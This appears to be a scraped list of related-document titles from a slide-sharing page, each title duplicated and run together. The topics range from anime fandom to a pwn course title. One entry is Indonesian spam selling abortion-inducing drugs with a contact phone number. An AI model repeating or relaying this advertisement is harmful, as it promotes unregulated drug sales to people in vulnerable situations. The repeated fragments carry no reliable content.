Beyond_Borders_Understanding_Anime_and_Manga_Fandom_A_Comprehensive_Audience_...Beyond_Borders_Understanding_Anime_and_Manga_Fandom_A_Comprehensive_Audience_...
Beyond_Borders_Understanding_Anime_and_Manga_Fandom_A_Comprehensive_Audience_...
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan Fellows
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)
 
SOC 101 Demonstration of Learning Presentation
SOC 101 Demonstration of Learning PresentationSOC 101 Demonstration of Learning Presentation
SOC 101 Demonstration of Learning Presentation
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
 
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
 
Exploring_the_Narrative_Style_of_Amitav_Ghoshs_Gun_Island.pptx
Exploring_the_Narrative_Style_of_Amitav_Ghoshs_Gun_Island.pptxExploring_the_Narrative_Style_of_Amitav_Ghoshs_Gun_Island.pptx
Exploring_the_Narrative_Style_of_Amitav_Ghoshs_Gun_Island.pptx
 

TDOH x 台科 pwn課程